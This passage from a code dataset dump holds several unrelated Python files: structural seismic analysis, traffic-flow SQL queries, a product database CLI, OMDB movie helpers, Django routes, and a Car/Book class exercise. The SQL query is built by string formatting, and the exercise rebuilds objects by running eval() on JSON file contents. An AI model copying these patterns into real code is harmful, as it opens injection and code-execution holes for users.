9.80665*m/s**2\n\n# Propiedades de los materiales\nfc = 210 # kg/cm2\nE = 15100*fc**0.5*10**4*9.80665*Pa\nG = 0.5*E/(1+0.2)\n# Sección de Columna\na = 60*cm\nAc = a**2\nρlc = 2400*Ac*m**2\nIzc = a**4/12\nIyc = a**4/12\nJxxc = 2.25*(a/2)**4\n# Sección de Viga\nb = 60*cm\nh = 30*cm\nA = b*h\nρl = 2400*A*m**2\nIz = b*h**3/12\nIy = b**3*h/12\nJxx = 0.229*max(b,h)*min(b,h)**3 # modificar\n#\ndef GeoModel(dx, dy, h, nx, ny, nz):\n from numpy import zeros, ones\n import matplotlib.pyplot as plt\n # import matplotlib.pyplot as plt\n Lx, Ly, Lz = dx*nx, dy*ny, h*nz\n NN = (nx+1)*(ny+1)*(nz+1)\n Nodes = zeros((NN,5))\n # Creando los nodos y asignando coordenadas\n c = 0\n for i in range(nz+1):\n for j in range(ny+1):\n for k in range(nx+1):\n if k == nx and j != ny and j!= 0:\n Nodes[c] = [c,k*dx,j*dy,i*h,0.50]\n elif k != nx and j == ny and k!= 0:\n Nodes[c] = [c,k*dx,j*dy,i*h,0.50]\n elif k == 0 and j != ny and j!= 0:\n Nodes[c] = [c,k*dx,j*dy,i*h,0.50]\n elif k != nx and j == 0 and k!= 0:\n Nodes[c] = [c,k*dx,j*dy,i*h,0.50]\n elif k == nx and j == ny:\n Nodes[c] = [c,k*dx,j*dy,i*h,0.25]\n elif k == 0 and j == 0:\n Nodes[c] = [c,k*dx,j*dy,i*h,0.25]\n elif k == nx and j == 0:\n Nodes[c] = [c,k*dx,j*dy,i*h,0.25]\n elif k == 0 and j == ny:\n Nodes[c] = [c,k*dx,j*dy,i*h,0.25]\n else:\n Nodes[c] = [c,k*dx,j*dy,i*h,1.00]\n c = c + 1\n Nodes[:(nx+1)*(ny+1),4]=0\n # print(Nodes)\n\n NE = (nx*(ny+1)+ny*(nx+1)+(nx+1)*(ny+1))*nz\n Elems = zeros((NE,4))\n # Creando las conexiones de los elementos verticales\n c = 0\n for i in range(nz):\n for j in range(ny+1):\n for k in range(nx+1):\n Elems[c] = [c,c,c+(nx+1)*(ny+1),1]\n c = c + 1\n # Creando las conexiones de los elementos horizontales\n m = (nx+1)*(ny+1)\n for i in range(nz):\n for j in range(ny+1):\n for k in range(nx):\n Elems[c] = [c,m,m+1,2]\n m = m + 1\n c = c + 1\n m = m + 1\n # Creando las conexiones de los elementos horizontales\n n = 0 \n for i in range(nz):\n n = n + (nx+1)*(ny+1)\n for j in range(nx+1):\n for k in range(ny):\n Elems[c] = [c,j+k*(nx+1)+n,j+nx+1+k*(nx+1)+n,2]\n c = c + 1\n # Creando centro de diafragmas\n Diap = zeros((nz,4))\n for i in range(nz):\n Diap[i] = [i+1000,Lx/2.0,Ly/2.0,h*(i+1)]\n #\n return Nodes, Elems, Diap\n\ndef espectro_E030(T,Z=0.45,U=1.5,S=1.0,Tp=0.4,Tl=2.5,R=1):\n from numpy import zeros\n n = len(T)\n E030 = zeros(n)\n for i in range(n):\n if T[i]>=0 and T[i]<0.2*Tp:\n E030[i]=2.5#1+7.5*T[i]/Tp\n elif T[i]>=0.2*Tp and T[i]=Tp and T[i]=Tl:\n E030[i] = 2.5*(Tp*Tl/T[i]**2)\n else:\n print(\"El periodo no puede ser negativo!\")\n return E030*Z*U*S/R\n\ndef get_static_loads(coef,p,h,T):\n from numpy import zeros\n n = len(h)\n V = coef*sum(p)\n F = zeros(n)\n #\n if T > 0.0 and T <= 0.5:\n k=1.0\n elif T>0.5:\n k = 0.75+0.5*T\n else:\n print('El periodo es negativo!')\n #\n div = 0.\n for i in range(n):\n div = div + p[i]*h[i]**k\n #\n for i in range(n):\n F[i] = p[i]*h[i]**k/div*V\n return F,k\n\ndef getCombo(E030,MF,modo,NT,Tmodes):\n import numpy as np\n import pandas as pd\n # Obtenemos las Masas totales\n Mx = sum(sum(MF[0::3,0::3]))\n My = sum(sum(MF[1::3,1::3]))\n Mr = sum(sum(MF[2::3,2::3]))\n\n # Definimos valores iniciales\n Ux,Uy,Rz = np.zeros(NT),np.zeros(NT),np.zeros(NT)\n Ux[0::3]=1\n Uy[1::3]=1\n Rz[2::3]=1\n SUMx, SUMy, SUMr = 0., 0., 0.\n Nmodes = len(modo) \n\n # Obtención de Masas Participativas\n ni=0\n np.set_printoptions(precision = 4)\n df1 = pd.DataFrame(columns=['Modo','T(s)','SumUx','SumUy','SumRz'])\n for j in range(1,Nmodes+1):\n FPx=modo[j-1].T@MF@Ux\n FPy=modo[j-1].T@MF@Uy\n FPr=modo[j-1].T@MF@Rz\n FPRx=FPx**2/Mx\n FPRy=FPy**2/My\n FPRr=FPr**2/Mr\n SUMx = SUMx + FPRx\n SUMy = SUMy + FPRy\n SUMr = SUMr + FPRr\n #\n if min(SUMx,SUMy,SUMr)>0.90 and ni==0:\n ni = j\n df1 = df1.append({'Modo':j, 'T(s)':Tmodes[j-1],'SumUx':SUMx,\n 'SumUy':SUMy,'SumRz':SUMr}, ignore_index=True)\n print('N° mínimo de Modos a considerar:',ni)\n\n # Definimos valores iniciales\n D_ABSx,D_RCSCx = np.zeros(NT),np.zeros(NT)\n Δ_ABSx,Δ_RCSCx = np.zeros(NT),np.zeros(NT)\n V_ABSx,V_RCSCx = np.zeros(NT),np.zeros(NT)\n D_ABSy,D_RCSCy = np.zeros(NT),np.zeros(NT)\n Δ_ABSy,Δ_RCSCy = np.zeros(NT),np.zeros(NT)\n V_ABSy,V_RCSCy = np.zeros(NT),np.zeros(NT)\n\n # Se realiza la Superpocisión Modal Espectral\n for j in range(1,ni+1):#ni+1\n FPx=modo[j-1].T@MF@Ux\n FPy=modo[j-1].T@MF@Uy\n FPr=modo[j-1].T@MF@Rz\n #\n Sa = E030[j-1]\n Sd = Sa*9.80665/(2*np.pi/Tmodes[j-1])**2\n #\n respDX = Sd*FPx*modo[j-1]\n respAX = Sa*FPx*MF@modo[j-1]\n D_ABSx = D_ABSx + abs(respDX)\n D_RCSCx = D_RCSCx + (respDX)**2\n respDX[3:] = respDX[3:] - respDX[:-3]\n Δ_ABSx = Δ_ABSx + abs(respDX)\n Δ_RCSCx = Δ_RCSCx + (respDX)**2\n V_ABSx = V_ABSx + abs(np.cumsum(respAX[::-1])[::-1])\n V_RCSCx = V_RCSCx + (np.cumsum(respAX[::-1])[::-1])**2\n #\n respDY = Sd*FPy*modo[j-1]\n respAY = Sa*FPy*MF@modo[j-1]\n D_ABSy = D_ABSy + abs(respDY)\n D_RCSCy = D_RCSCy + (respDY)**2\n respDY[3:] = respDY[3:] - respDY[:-3]\n Δ_ABSy = Δ_ABSy + abs(respDY)\n Δ_RCSCy = Δ_RCSCy + (respDY)**2\n V_ABSy = V_ABSy + abs(np.cumsum(respAY[::-1])[::-1])\n V_RCSCy = V_RCSCy + (np.cumsum(respAY[::-1])[::-1])**2\n\n # Se realiza la combinación 25%ABS + 75%RCSC\n D_RCSCx = D_RCSCx**0.5\n Δ_RCSCx = Δ_RCSCx**0.5\n V_RCSCx = V_RCSCx**0.5\n DDx = 0.25*D_ABSx + 0.75*D_RCSCx\n ΔDx = 0.25*Δ_ABSx + 0.75*Δ_RCSCx\n VDx = 0.25*V_ABSx + 0.75*V_RCSCx\n #\n D_RCSCy = D_RCSCy**0.5\n Δ_RCSCy = Δ_RCSCy**0.5\n V_RCSCy = V_RCSCy**0.5\n DDy = 0.25*D_ABSy + 0.75*D_RCSCy\n ΔDy = 0.25*Δ_ABSy + 0.75*Δ_RCSCy\n VDy = 0.25*V_ABSy + 0.75*V_RCSCy\n \n df2 = pd.DataFrame(columns=['Nivel','VDx(ton)','VDy(ton)','UDx(cm)','UDy(cm)'])\n for i in range(int(NT/3)):\n df2 = df2.append({'Nivel':i+1, 'VDx(ton)':VDx[0::3][i]/1000,\n 'VDy(ton)':VDy[1::3][i]/1000,'UDx(cm)':DDx[0::3][i]*100,\n 'UDy(cm)':DDy[1::3][i]*100}, ignore_index=True)\n\n return DDx, ΔDx, VDx, DDy, ΔDy, VDy, df1.iloc[:ni,:], df2\n\ndef genReport(df1,df2,df3,df4,df5,texto1,texto2):\n from PIL import Image\n import glob\n #\n lista = glob.glob('./imagenes/Mod*.png')\n #\n for archivo in lista:\n im = Image.open(archivo)\n width, height = im.size\n left, top = width/6, height/6\n right, bottom = 9*width/10, 9*height/10\n im1 = im.crop((left, top, right, bottom))\n im1.save(archivo)\n #\n from docx import Document\n from docx.shared import Inches\n from docx.enum.text import WD_ALIGN_PARAGRAPH\n\n document = Document()\n title1 = document.add_heading('Informe del Análisis Sísmico', 0)\n title1.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n p = document.add_paragraph('Realizado por ')\n p.add_run('JPI Ingeniería e Innovación SAC').bold = True\n p.add_run(' para el curso ')\n p.add_run('ASEP.').italic = True\n\n document.add_paragraph('Edificio Analizado - vista 3D:')\n document.add_picture('./imagenes/Modelo_3D.png', width=Inches(5.0))\n document.add_paragraph('Edificación de Categoría Tipo C.')\n\n document.add_heading('Generalidades', level=1)\n document.add_paragraph('Metrado de Cargas', style='Intense Quote')\n\n document.add_paragraph('Para el metrado de cargas se consideró las siguientes cargas distribuidas:')\n document.add_paragraph('Carga Viva:\\t\\t\\t\\t250 kg/m2', style='List Bullet')\n document.add_paragraph('Carga de Losa:\\t\\t\\t300 kg/m2', style='List Bullet')\n document.add_paragraph('Carga de Acabados:\\t\\t100 kg/m2', style='List Bullet')\n document.add_paragraph('Carga de Tabiquería:\\t\\t150 kg/m2', style='List Bullet')\n\n document.add_picture('./imagenes/Modelo_numerico.png', width=Inches(5.0))\n f1 = document.add_paragraph('Figura 1: Modelo Numérico para el Análisis.')\n f1.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n document.add_heading('Análisis Modal', level=1)\n document.add_paragraph('Modos de Vibración', style='Intense Quote')\n #\n t1 = document.add_paragraph('\\nTabla 1: Factor de Participación de Masas.')\n t1.alignment = WD_ALIGN_PARAGRAPH.CENTER\n table1 = document.add_table(rows=df1.shape[0]+1, cols=df1.shape[1])\n table1.style = 'Light Grid Accent 1'\n for j in range(df1.shape[-1]):\n table1.cell(0,j).text = df1.columns[j]\n for i in range(df1.shape[0]):\n for j in range(df1.shape[-1]):\n table1.cell(i+1,j).text = str(df1.values[i,j].round(4))\n\n document.add_picture('./imagenes/Modo_1.png', width=Inches(5.0))\n f2 = document.add_paragraph('Figura 2: Primer modo de vibración.')\n f2.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n document.add_picture('./imagenes/Modo_2.png', width=Inches(5.0))\n f3 = document.add_paragraph('Figura 3: Segundo modo de vibración.')\n f3.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n document.add_picture('./imagenes/Modo_3.png', width=Inches(5.0))\n f4 = document.add_paragraph('Figura 4: Tercer modo de vibración.')\n f4.alignment = WD_ALIGN_PARAGRAPH.CENTER\n #\n document.add_heading('Análisis Sísmico', level=1)\n document.add_paragraph('Análisis Estático', style='Intense Quote')\n p1 = document.add_paragraph(texto1)\n p1.alignment = WD_ALIGN_PARAGRAPH.JUSTIFY\n #\n t2 = document.add_paragraph('Tabla 2: Fuerzas y desplazamientos del análisis estático en X.')\n t2.alignment = WD_ALIGN_PARAGRAPH.CENTER\n table3 = document.add_table(rows=df3.shape[0]+1, cols=df3.shape[1])\n table3.style = 'Light Grid Accent 1'\n for j in range(df3.shape[-1]):\n table3.cell(0,j).text = df3.columns[j]\n for i in range(df3.shape[0]):\n for j in range(df3.shape[-1]):\n table3.cell(i+1,j).text = str(df3.values[i,j].round(4))\n t3 = document.add_paragraph('\\nTabla 3: Fuerzas y desplazamientos del análisis estático en Y.')\n t3.alignment = WD_ALIGN_PARAGRAPH.CENTER\n #\n table4 = document.add_table(rows=df4.shape[0]+1, cols=df4.shape[1])\n table4.style = 'Light Grid Accent 1'\n for j in range(df4.shape[-1]):\n table4.cell(0,j).text = df4.columns[j]\n for i in range(df4.shape[0]):\n for j in range(df4.shape[-1]):\n table4.cell(i+1,j).text = str(df4.values[i,j].round(4))\n #\n document.add_paragraph('Análisis Dinámico Modal Espectral', style='Intense Quote')\n #\n document.add_paragraph('En este análisis se consideraron los siguientes parámetros sísmicos:')\n document.add_paragraph('Factor de Zona:\\t\\t\\t\\tZ = 0.45', style='List Bullet')\n document.add_paragraph('Factor de Uso:\\t\\t\\t\\tU = 1.00', style='List Bullet')\n document.add_paragraph('F. de Amplificación del Suelo:\\t\\tS = 1.00', style='List Bullet')\n document.add_paragraph('Coef. de Reducción:\\t\\t\\tRo= 8.00', style='List Bullet')\n\n document.add_picture('./imagenes/Espectro_E030.png', width=Inches(5.4))\n f5 = document.add_paragraph('Figura 5: Espectro según la norma E030.')\n f5.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n t4 = document.add_paragraph('\\nTabla 4: Respuesta Dinámica sin escalar.')\n t4.alignment = WD_ALIGN_PARAGRAPH.CENTER\n table2 = document.add_table(rows=df2.shape[0]+1, cols=df2.shape[1])\n table2.style = 'Light Grid Accent 1'\n for j in range(df2.shape[-1]):\n table2.cell(0,j).text = df2.columns[j]\n for i in range(df2.shape[0]):\n for j in range(df2.shape[-1]):\n table2.cell(i+1,j).text = str(df2.values[i,j].round(4))\n #\n p2 = document.add_paragraph(texto2)\n p2.alignment = WD_ALIGN_PARAGRAPH.JUSTIFY\n #\n t5 = document.add_paragraph('\\nTabla 5: Respuesta Dinámica Escalada.')\n t5.alignment = WD_ALIGN_PARAGRAPH.CENTER\n table5 = document.add_table(rows=df5.shape[0]+1, cols=df5.shape[1])\n table5.style = 'Light Grid Accent 1'\n for j in range(df5.shape[-1]):\n table5.cell(0,j).text = df5.columns[j]\n for i in range(df5.shape[0]):\n for j in range(df5.shape[-1]):\n table5.cell(i+1,j).text = str(df5.values[i,j].round(4))\n #\n document.add_page_break()\n document.add_heading('Resultados', level=1)\n document.add_paragraph('Distorsiones de Entrepiso', style='Intense Quote')\n document.add_picture('./imagenes/distorsion_din.png', width=Inches(5.0))\n f6 = document.add_paragraph('Figura 6: Distorsión de entrepiso del análisis dinámico.')\n f6.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n file = 'Informe de Analisis Sismico.docx'\n document.save(file)\n import os\n os.startfile('%s'%file)","repo_name":"Julian-Palacios/ASEP","sub_path":"OSP_tools.py","file_name":"OSP_tools.py","file_ext":"py","file_size_in_byte":13805,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"28731055222","text":"from jdbc.Connect import get_connection\nimport datetime\nimport pandas as pd\nimport numpy as np\nfrom jdbc.Convert_strTo_time_then_str import Convert_strTo_time_then_str\n\n\n# 输入:查询卡口的编号('HK-107');查询时段的开始和结束时间(字符串形式,'2019-10-08 16:00:00');车道编号格式:[('1','2'...)]\ndef Query_ls(conn, SSID, start_time, end_time, cdbh):\n if conn == None: conn = get_connection() # conn为None时,建立数据库连接\n cr = conn.cursor() # 建立查询游标\n # 从卡口流水表中查询给定卡口编号、时段和车道组编号的JGSJ\n query_sql = (\n \"SELECT JGSJ FROM SJCJ_T_CLXX_LS WHERE SSID = '%s' AND CDBH IN %s AND TO_CHAR(JGSJ,'YYYY-MM-DD HH24:MI:SS') BETWEEN '%s' AND '%s'\") % (\n SSID, cdbh[0], start_time, end_time)\n cr.execute(query_sql) # 执行查询\n query_res = cr.fetchall() # 提取查询结果,赋予变量query_res,查询结果形式:[(结果1),(结果2),(结果3)...]\n query_res = [i[0] for i in query_res] # 重新组织查询结果,变成[结果1,结果2,...]\n series_res = pd.Series(data=query_res, dtype='datetime64[ns]') # 将jgsj列转为Series格式,数据类型指定为datetime64\n result = pd.Series(np.ones(len(query_res)), index=series_res) # 将查询到的JGSJ时间列设置为索引,Series的值为1(索引—1辆车)\n ls_query_result = result.sort_index(ascending=True) # 将构建好的Series按索引升序排序(输出结果时间升序)\n return ls_query_result # 返回流水查询结果\n\n\n# 求x和y的最小公倍数\ndef lcm(x, y):\n # 获取最大的数\n if x > y:\n greater = x\n smaller = y\n else:\n greater = y\n smaller = x\n if smaller == 0: return 0 # 当x和y中有一个数位0时,返回0\n else:\n\n while (True):\n if ((greater % x == 0) and (greater % y == 0)):\n lcm = greater\n break\n greater += 1\n\n return lcm # 返回最小公倍数\n\n\n# 输入一个datetime格式的数,返回一个抹去秒值的整datetime(即datetime向下圆整)\ndef Round_datetime(date_time):\n tem = str(date_time)[:-2]+'00'\n tem = pd.to_datetime(tem, format='%Y-%m-%d %H:%M:%S')\n return tem # 返回结果的格式为 YYYY-MM-DD HH24:MI:SS\n\n\n# 统计流量函数(滑动时间窗),输入为流水查询结果,可任意输入统计的周期和滑动时间窗口长度,返回流量统计结果\ndef Flow_statistical(ls_query_result, timedelta, step_length):\n if timedelta >= step_length: # 判断统计时段是否大于等于滑动时间窗长度\n if step_length != 0: # 滑动时间窗步长不为0时\n low_cm = lcm(timedelta, step_length) # 滑动时间窗步长与统计周期的最小公倍数\n loop_num = int(low_cm / step_length) # 流量统计的循环次数\n else: loop_num = 1 # 步长为0,只统计1次(即 不滑动)\n str_timedelta = str(timedelta) + 'T' # 这里'T'表示抽样频率为分钟,其他时间频率可参看pd.resample()参数\n resample_list = [] # 重新抽样统计之后,结果存储列表\n for i in range(loop_num):\n sample_step_length = step_length * i # 第i次循环的滑动时间窗步长\n # 参数base指定整个序列滑动时间窗的起点(base参数的单位与str_timedelta相同,是一个int型的数)\n # label指定了重新抽样之后,时间标签显示为区间右侧\n resample_list.append(ls_query_result.resample(str_timedelta, base=sample_step_length, label='right').sum())\n result_tem = pd.concat(resample_list) # 将重新抽样统计后的结果合并(axis=0,竖直方向直接堆叠在一起)\n result_tem = result_tem.sort_index(ascending=True) # 按索引升序排序(输出结果时间升序)\n\n # 下面要微调统计结果,使得统计区间与滑动时间窗统计相符(去掉样本数不够的统计值)\n # 索引时间戳显示的是统计时间段闭区间右侧的值,所以开始的时间戳应为——向下圆整:流水查询结果的时间索引中的最小值 + 统计周期长度\n start_period = Round_datetime(ls_query_result.index.min()) + datetime.timedelta(minutes=timedelta)\n # 索引时间戳显示的是统计时间段闭区间右侧的值,所以结束的时间戳应为——向上圆整:流水查询结果的时间索引中的最大值\n end_period = Round_datetime(ls_query_result.index.max()) + datetime.timedelta(minutes=1)\n result = result_tem[(result_tem.index >= start_period) & (result_tem.index <= end_period)] # 按索引切片\n return result # 返回流量统计结果\n else:\n print(\"Error: 时间窗步长大于统计周期\") # 报错,不统计\n\n\nif __name__ == '__main__':\n starttime = datetime.datetime.now() # 统计程序的开始时刻\n\n conn = None\n query_result = Query_ls(conn, 'HK-107', '2019-10-08 16:00:00', '2019-10-08 17:00:00',[('1','2')])\n # print(result)\n # query_result.to_csv('query_ls.csv')\n # print(result.resample('5T', label='right').sum())\n flow_result = Flow_statistical(query_result, 5, 2) # 第二个参数表示:统计的周期(单位:min);第三个参数是:滑动时间窗的长度\n print(flow_result)\n\n endtime = datetime.datetime.now()\n print(\"the program runs : %d s\" % (endtime - starttime).seconds)\n","repo_name":"cf28920782519/XC","sub_path":"TrafficFlow.py","file_name":"TrafficFlow.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3690477468","text":"from products import *\r\nfrom query_handler import *\r\n\r\n\r\ndef adding_product(product: products, query: QueryHandler):\r\n \"\"\"\r\n function that adds or updates a product if it already exists in the database\r\n \"\"\"\r\n query.execute_non_fetch(\r\n \"INSERT INTO products (barcode,products_name,quantity) VALUES(%s,%s,%s) ON DUPLICATE KEY UPDATE barcode=VALUES(barcode), products_name=VALUES(products_name),quantity=VALUES(quantity)\",\r\n (product.barcode, product.product_name, product.quantity))\r\n print(\"insert done\")\r\n\r\n\r\ndef delete_product(barcode: str, query: QueryHandler):\r\n \"\"\"\r\n function that deletes a product in the database according to the given barcode\r\n :param barcode: products barcode (special code)\r\n \"\"\"\r\n products = query.execute_fetch(\"SELECT * FROM products WHERE barcode=%s\", (barcode,))\r\n if len(products) != 0:\r\n query.execute_non_fetch(\"DELETE FROM products WHERE barcode=%s\", (barcode,))\r\n print(\"delete done\")\r\n else:\r\n print(\"Barcode doesn't exist\")\r\n\r\n\r\ndef show_all_products(query: QueryHandler):\r\n \"\"\"\r\n fucntion that prints the products table in the database\r\n \"\"\"\r\n # print(query.execute_fetch(\"SELECT * FROM products\", ()))\r\n products = query.execute_fetch(\"SELECT * FROM products\", ())\r\n for item in products:\r\n for k,v in item.items():\r\n print(k,\":\",v)\r\n print()\r\n\r\ndef start_Code(q):\r\n \"\"\"\r\n Function that either insert/update/delete or print products according to users input\r\n if user clicks 1 it inserts or updates the databse\r\n if user clicks 2 it deletes a product from database\r\n if user clicks 3 it prints all the table in the database\r\n if user clicks 4 it exists the code\r\n \"\"\"\r\n while True:\r\n option = input(\"\"\"enter your choice: \r\n Number 1: To insert or update a product.\r\n Number 2: To delete a product.\r\n Number 3: To print all the products\r\n Number 4: To exit\r\n my choice: \r\n \"\"\")\r\n\r\n if option == \"1\":\r\n print(\"please enter product details,, \")\r\n product = products(input(\"product barcode: \"), input(\"product name: \"),\r\n int(input(\"product quantity: \")))\r\n adding_product(product, q)\r\n elif option == \"2\":\r\n print(\"please enter product barcode,, \")\r\n barcode = input(\"product barcode: \")\r\n delete_product(barcode, q)\r\n elif option == \"3\":\r\n show_all_products(q)\r\n elif option == \"4\":\r\n print(\"Thank you for using our program. Exiting...\")\r\n break\r\n else:\r\n print(\"please enter only one option for the list [1,2,3,4]\")\r\n","repo_name":"EbraFH/Python-SQL-Assessment","sub_path":"products_handle.py","file_name":"products_handle.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19505851044","text":"from datetime import datetime\r\nimport gzip\r\nimport os\r\nimport random\r\nimport shutil\r\nimport requests\r\nimport numpy as np\r\nimport urllib.request\r\n\r\ndef single_movie(ID, API_KEY):\r\n URL = \"http://www.omdbapi.com/?i={}&apikey={}\".format(ID, API_KEY)\r\n r = requests.get(URL)\r\n json = r.json()\r\n\r\n title, link, year, rating, runtime, genre, poster, desc, director = [json['Title']], [json['Poster']], [json['Year']],\\\r\n [json['Rated']], [json['Runtime']], \\\r\n [json['Genre']], [json['Poster']], [json['Plot']], [json['Director']]\r\n return title, link, year, rating, runtime, genre, poster, desc, director\r\n\r\n\r\ndef genries(query, API_KEY):\r\n \r\n URL = \"http://www.omdbapi.com/?s={}&apikey={}\".format(query, API_KEY)\r\n\r\n r = requests.get(URL)\r\n json = r.json()\r\n \r\n genre_dict = {}\r\n\r\n if json['Response'] == 'True' or json['Response'] == True:\r\n search_result = json['Search']\r\n for movie in search_result:\r\n \r\n _, _, _, _, _, genre_list, _, _, _ = single_movie(movie['imdbID'],API_KEY)\r\n\r\n for genre in genre_list[0].split(\",\"):\r\n if genre in genre_dict.keys():\r\n genre_dict[genre][0].append(movie['Poster'])\r\n genre_dict[genre][1].append(movie['Type'])\r\n genre_dict[genre][2].append(movie['imdbID'])\r\n genre_dict[genre][3].append(movie['Title'])\r\n else:\r\n genre_dict[genre] = [[],[],[],[]]\r\n gen = []\r\n for k,v in genre_dict.items():\r\n gen.append([k,np.array(v,dtype=object).T])\r\n return gen\r\n\r\ndef rand_search():\r\n searches = [\"love\", \"game\", \"biography\", \"science\", \"hate\", \"trouble\", \"care\", \"romance\", \"crime\", \"high school\"]\r\n rand = random.randint(0,9)\r\n return searches[rand]\r\n\r\ndef download():\r\n \r\n data_path = 'app/backend/data/'\r\n urllib.request.urlretrieve('https://datasets.imdbws.com/title.ratings.tsv.gz', data_path+'title.tsv.gz')\r\n\r\n with gzip.open(data_path+'title.tsv.gz', 'rb') as f:\r\n data = f.readlines()\r\n\r\n data = [f.decode(\"utf-8\").split('\\t')[0] for f in data]\r\n\r\n return data[::-1]\r\n\"\"\"\r\nif __name__ == \"__main__\":\r\n print(download())\"\"\"","repo_name":"anthony-chukwuemeka-nwachukwu/Movie-App","sub_path":"app/backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39576390095","text":"from django.urls import path\nfrom . import views\n\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Survey API\",\n default_version=\"v1.3\",\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\napp_name = \"api_service\"\n\nurlpatterns = [\n path(\"\", schema_view.with_ui(\"swagger\", cache_timeout=0), name=\"schema-swagger-ui\"),\n path(\"questions/\", views.QuestionsList.as_view()),\n path(\"questions//\", views.QuestionDetail.as_view()),\n path(\"questions//options/\", views.OptionsList.as_view()),\n path(\n \"questions//options//\",\n views.OptionDetail.as_view(),\n ),\n path(\"users/\", views.UserList.as_view()),\n path(\"users//\", views.UserDetail.as_view()),\n]\n","repo_name":"renmarin/survey","sub_path":"api_service/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19440801289","text":"import pickle, json\n\nprint('Задание 1. Реализуйте класс «Автомобиль».')\n\n\nclass ItemsCollection:\n @staticmethod\n def save_pikle(item, filename):\n with open(filename, 'wb') as f:\n pickle.dump(item, f)\n\n @staticmethod\n def load_pikle(filename):\n with open(filename, 'rb') as f:\n return pickle.load(f)\n\n @staticmethod\n def save_JSON(item, filename):\n with open(filename, 'w') as f:\n if isinstance(item, list) and all([isinstance(elm, ItemsCollection) for elm in item]):\n json_obj = []\n for elm in item:\n json_obj.append(f'{elm.__class__.__name__}(**{elm.__dict__})')\n json.dump(json_obj, f)\n elif isinstance(item, ItemsCollection):\n json.dump(f'{item.__class__.__name__}(**{item.__dict__})', f)\n\n @staticmethod\n def load_JSON(filename):\n with open(filename, 'r') as f:\n json_obj = json.load(f)\n if isinstance(json_obj, list):\n item = [eval(elm) for elm in json_obj]\n else:\n item = eval(json_obj)\n return item\n\n\nclass Car(ItemsCollection):\n VALID_KEYS = (\"model\", \"engine_volume\", \"automaker\", \"car_color\", \"year\")\n\n def __init__(self, model, year=None, car_color=None, automaker=None, engine_volume=None):\n self.model = model\n self.year = year\n self.car_color = car_color\n self.automaker = automaker\n self.engine_volume = engine_volume\n\n def set_info(self):\n self.model = input(\"Введите модель: \")\n self.year = input(\"Введите год выпуска: \")\n self.car_color = input(\"Введите цвет кузова: \")\n self.automaker = input(\"Введите производителя: \")\n self.engine_volume = input(\"Введите объем двигателя: \")\n\n def print_info(self):\n print(f'Автомобиль: {self.model}\\n\\t'\n f'объем двигателя: {self.engine_volume}\\n\\t'\n f'производитель: {self.automaker}\\n\\t'\n f'цвет кузова: {self.car_color}\\n\\t'\n f'год выпуска: {self.year};')\n\n def __setattr__(self, key, value):\n if key in self.VALID_KEYS and value != \"\":\n self.__dict__[key] = value\n elif key == \"model\":\n self.__dict__[key] = \"Undefined model\"\n elif key not in self.VALID_KEYS:\n raise AttributeError(\"Недопустимый атрибут\")\n else:\n raise ValueError(\"Значение не должно быть пустым\")\n\n def __repr__(self):\n return f\"{self.model}, {self.year}, {self.car_color}\"\n\n\na_car = Car(\"Mercedes SL350\", 2015, \"White\", \"MS\", 3500)\nb_car = Car(\"BMW 320D\", 2019, \"Black\", \"BMW\", 2000)\nc_car = Car(\"Toyota Camry\", 1998, \"Grey\", \"Toyota\", 2400)\na_car.save_pikle(a_car, \"a_car.pkl\")\nb_car.save_pikle(b_car, \"b_car.pkl\")\nItemsCollection.save_pikle(c_car, \"c_car.pkl\")\na2_car = ItemsCollection.load_pikle(\"a_car.pkl\")\nb2_car = Car.load_pikle(\"b_car.pkl\")\nc2_car = Car.load_pikle(\"c_car.pkl\")\nprint(a2_car, b2_car, c2_car, sep=\"\\n\")\na_car.save_JSON(a_car, \"a_car.json\")\ncars = [a_car, b_car, c_car]\nItemsCollection.save_pikle(cars, \"cars.pkl\")\npikle_cars = ItemsCollection.load_pikle(\"cars.pkl\")\nprint(\"pikle cars\")\nprint(*map(type, pikle_cars), pikle_cars)\nItemsCollection.save_JSON(cars, \"cars.json\")\ncars = ItemsCollection.load_JSON(\"cars.json\")\nprint(\"JSON cars\")\nprint(*map(type, cars), cars)\na3_car = ItemsCollection.load_JSON(\"a_car.json\")\nprint(a3_car, type(a3_car))\n\n# ==============================================================================\nprint('\\n\\nЗадание 2. Реализуйте класс «Книга».')\n\n\nclass Book(ItemsCollection):\n def __init__(self, name, author=None, year=None, publisher=None, genre=None):\n self.name = name\n self.author = author\n self.year = year\n self.publisher = publisher\n self.genre = genre\n\n def set_info(self):\n self.name = input(\"Введите название: \")\n self.author = input(\"Введите автора: \")\n self.year = input(\"Введите год издания: \")\n self.publisher = input(\"Введите издателя: \")\n self.genre = input(\"Введите жанр: \")\n\n def print_info(self):\n print(f'Книга: {self.name}\\n\\t'\n f'автор: {self.author}\\n\\t'\n f'год издания: {self.year}\\n\\t'\n f'издательство: {self.publisher}\\n\\t'\n f'жанр: {self.genre};')\n\n def __repr__(self):\n return f\"{self.name}, {self.author}, {self.year}, {self.genre}\"\n\n\na_book = Book('АРХИТЕКТУРА ЭВМ', 'Жмакин А.П.', 2010, genre=\"компьютерная литература\")\nb_book = Book('Мини-ЭВМ. Организация и программирование', 'Экхауз Р., Моррис Л.', 1983, genre=\"компьютерная литература\")\nc_book = Book('PDP-11. Архитектура и программирование', 'Фрэнк Томас', 